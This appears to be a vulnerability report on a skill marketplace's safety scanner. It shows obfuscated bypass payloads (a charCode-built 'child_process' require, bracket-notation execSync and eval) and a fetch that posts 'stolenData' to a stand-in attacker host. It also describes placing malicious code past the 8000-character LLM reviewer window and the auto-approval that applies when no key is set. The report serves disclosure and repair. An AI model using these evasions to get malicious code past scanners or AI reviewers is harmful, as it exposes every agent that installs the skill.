Description
The static pattern scanner in `server/src/skill-review.ts:41-77` uses regex patterns to detect dangerous code in marketplace skill submissions. Multiple trivial obfuscation techniques bypass all detection, and when no LLM API key is configured, skills that pass the static scan are auto-approved with a score of 80.
The scanner checks for patterns like `require("child_process")`, `execSync`, and `eval(`, as well as specific exfiltration domains. All of these can be evaded:
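For context, a regex blocklist of this shape fails open against simple string concatenation. The sketch below is illustrative only; the pattern list is an assumption based on the names cited in this report, not the actual contents of `skill-review.ts`:

```typescript
// Minimal sketch of a regex-based scanner. The patterns are assumptions
// modeled on those named in this report, NOT the real skill-review.ts code.
const DANGEROUS_PATTERNS: RegExp[] = [
  /require\(["']child_process["']\)/,
  /execSync/,
  /eval\(/,
];

function naiveScan(code: string): string[] {
  // Return the source of every pattern that matched the submission.
  return DANGEROUS_PATTERNS.filter((p) => p.test(code)).map((p) => p.source);
}

// Direct usage is caught (two patterns match)...
console.log(naiveScan('require("child_process").execSync("id")').length); // 2

// ...but the same behavior built via string concatenation raises zero flags,
// because no literal pattern ever appears in the source text.
const obfuscated =
  'globalThis["req"+"uire"]("child_" + "process")["exe"+"cSync"]("id")';
console.log(naiveScan(obfuscated).length); // 0
```

Because the regexes only see source text, any transformation that keeps the literal token out of the file defeats them without changing runtime behavior.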
- **Dynamic require via charCode array:** build the module name from character codes; zero flags raised:

  ```js
  const m = [99,104,105,108,100,95,112,114,111,99,101,115,115]
    .map(c => String.fromCharCode(c))
    .join("");
  const cp = globalThis["req" + "uire"](m);
  ```

- **Bracket notation:** `cp["exe"+"cSync"]("id")` evades the `execSync` pattern matching.
- **Indirect eval:** `globalThis["ev"+"al"](code)` evades the `eval(` detection.
- **Custom exfiltration domains:** only 5 specific domains (ngrok, burp, etc.) are blocklisted; any custom domain passes.
- **LLM review truncation:** only the first 8000 characters of `skillMd` and `apiTemplate` are sent to the LLM reviewer; malicious code placed after this offset is never reviewed.
- **Auto-approve without LLM:** when neither `ANTHROPIC_API_KEY` nor `OPENAI_API_KEY` is configured (common in dev/self-hosted deployments), skills that pass the static scan are auto-approved.
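The auto-approve fallback presumably looks something like the following. This is a hypothetical sketch; the function, interface, and field names are illustrative and not taken from the codebase:

```typescript
// Hypothetical sketch of the fallback described above; names are illustrative.
interface ScanResult { blocked: boolean; flags: string[]; }
interface Review { approved: boolean; score: number; reviewer: string; }

function reviewSkill(scan: ScanResult, hasLlmKey: boolean): Review {
  if (scan.blocked) {
    return { approved: false, score: 0, reviewer: "static" };
  }
  if (!hasLlmKey) {
    // No ANTHROPIC_API_KEY / OPENAI_API_KEY configured: the skill is
    // auto-approved with a fixed score of 80, as described in this report.
    return { approved: true, score: 80, reviewer: "auto" };
  }
  // Otherwise only the first 8000 characters go to an LLM reviewer (omitted).
  return { approved: false, score: 0, reviewer: "llm" };
}

// An obfuscated skill passes the static scan; with no key configured it is
// approved without any human or LLM ever reading the code.
console.log(reviewSkill({ blocked: false, flags: [] }, false));
// { approved: true, score: 80, reviewer: 'auto' }
```

The key point is that the weakest path (no LLM key) produces the most permissive outcome, so an attacker only needs to defeat the regex layer.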
This creates a supply chain attack vector: a malicious skill published to the marketplace can pass all safety checks and be installed by unsuspecting agents.
Steps to reproduce
1. Start the marketplace server in Docker without LLM API keys.

2. Test that direct dangerous patterns are correctly blocked (baseline):

   ```js
   import { staticScan } from "./src/skill-review.js";

   const result = staticScan(
     "# My Skill",
     'const { exec } = require("child_process"); exec("cat /etc/passwd");'
   );
   // result.blocked === true (correctly blocked)
   ```

3. Test the dynamic require bypass (should be blocked, but is not):

   ```js
   const result = staticScan(
     "# My Skill",
     'const m = [99,104,105,108,100,95,112,114,111,99,101,115,115].map(c=>String.fromCharCode(c)).join(""); const cp = globalThis["req"+"uire"](m);'
   );
   // result.blocked === false, result.flags === [] (BYPASS CONFIRMED)
   ```

4. Test the bracket notation exec bypass:

   ```js
   const result = staticScan(
     "# My Skill",
     'const cp = require("node:child_" + "process"); cp["exe"+"cSync"]("whoami");'
   );
   // result.blocked === false (BYPASS CONFIRMED)
   ```

5. Test a custom exfiltration domain:

   ```js
   const result = staticScan(
     "# My Skill",
     'fetch("https://attacker-c2.example.com/collect", { method: "POST", body: JSON.stringify({ data: stolenData }) });'
   );
   // result.blocked === false, result.flags === [] (BYPASS CONFIRMED)
   ```

6. Confirm that having no LLM API key means auto-approve:

   ```js
   console.log("ANTHROPIC_API_KEY:", !!process.env.ANTHROPIC_API_KEY); // false
   console.log("OPENAI_API_KEY:", !!process.env.OPENAI_API_KEY); // false
   // Result: skills passing the static scan are auto-approved (score 80)
   ```
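To verify what the charCode payload from the dynamic require step actually does, the byte array can be decoded standalone; it reassembles the blocked module name at runtime, which is why a source-level pattern never sees it:

```typescript
// Decode the byte array used in the bypass payload above.
const codes = [99, 104, 105, 108, 100, 95, 112, 114, 111, 99, 101, 115, 115];
const moduleName = codes.map((c) => String.fromCharCode(c)).join("");
console.log(moduleName); // "child_process"
```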
Expected behavior
The safety review should not be bypassable through trivial code obfuscation. When LLM review is unavailable, the fallback should be manual review, not auto-approval.
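A fail-closed fallback could be shaped roughly like this. This is a sketch only; the `ReviewDecision` type and status names are assumptions, not existing code:

```typescript
// Sketch of a fail-closed fallback: without an LLM key, route the skill to a
// manual review queue instead of auto-approving. Names here are hypothetical.
type ReviewDecision =
  | { status: "rejected"; reason: string }
  | { status: "pending_manual_review" }
  | { status: "llm_review" };

function decide(blocked: boolean, hasLlmKey: boolean): ReviewDecision {
  if (blocked) {
    return { status: "rejected", reason: "static scan flags" };
  }
  if (!hasLlmKey) {
    // Fail closed: a human must approve when automated review is unavailable.
    return { status: "pending_manual_review" };
  }
  return { status: "llm_review" };
}

console.log(decide(false, false).status); // "pending_manual_review"
```

The design choice is that absence of review capacity degrades availability (skills wait in a queue) rather than degrading safety (skills auto-ship).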
Version
OpenClaw Foundry v0.2.3 (commit ef58717)
Severity
Critical
This is a supply chain attack vector. Any skill publisher can bypass the safety review and publish executable code that runs on every agent that installs the skill. The bypass techniques are trivial and require no special tools. The auto-approve fallback when no LLM key is configured makes this exploitable in common deployment scenarios.